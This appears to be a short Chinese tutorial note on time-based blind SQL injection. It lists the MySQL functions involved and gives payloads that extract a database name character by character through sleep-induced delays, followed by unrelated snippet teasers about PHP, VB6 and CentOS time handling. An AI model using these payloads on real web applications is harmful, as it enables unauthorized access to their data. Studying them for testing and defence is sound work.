時間盲注常用函式
sleep(
) //延遲函式
if(condition,true,false) //條件語句
ascii(
) //轉換成ascii碼
substring(
"string",strart,length) //mid(
)也一樣,取出字串裡的第幾位開始,長度多少的字元
1、判斷是否存在延時注入
當頁面延時返回時,代表存在時間盲注。
2、判斷當前資料庫名
payload
?id=1" and if(substr(database(),1,1)>'a',sleep(5),1)--+
?id=1" and if(ascii(substr(database(
),1,1))
>97,sleep(5),1)--+
接著利用二分法判斷出資料庫名。
主要方法與布林盲注類似。
php筆記(6) 時間與日期
time time echo time 1396193923,這個數字表示從1970年1月1日 00 00 00 到我輸出這個指令碼時經歷了1396193923秒 date函式,第二個引數取預設值的情況 echo date y m d 2014 03 30 date函式,第二個引數有值的情況 ech...
VB6 時間戳函式
時間戳常量 private const timezone china as long h8 中國 北京 時區 東八區 private const timestamp max as date 1 19 2038 11 14 07 am 時間戳最大值 h7fffffff private const ti...
CentOS 6 時間,時區,設定修改及時間同步
一 時區 顯示時區 date help 獲取幫助 date r date z 上面兩個命令都可 plain view plain copy root localhost date r date z fri,19 oct 2012 23 34 27 0800 0800 主要就是後面的 0800,東八區...